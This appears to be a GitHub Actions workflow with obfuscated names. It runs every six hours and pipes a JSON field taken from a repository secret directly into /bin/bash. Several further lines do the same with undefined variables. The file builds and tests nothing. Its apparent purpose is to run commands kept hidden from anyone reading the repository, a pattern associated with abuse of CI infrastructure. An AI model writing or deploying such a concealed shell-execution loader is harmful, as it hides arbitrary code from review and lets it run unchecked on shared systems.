name: zhaojinan7890

on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          kqsfg48: ${{ secrets.kqsfg48 }}
        run: |
          echo $kqsfg48 | jq -r .qfpwi66857 | /bin/bash
          echo $wjbea89508 | jq -r .cqxt1 | /bin/bash
          echo $ixdo6311 | jq -r .n5188 | /bin/bash
          echo $hq2988 | jq -r .yiii1 | /bin/bash
          echo $kvnf73 | jq -r .pojt62 | /bin/bash

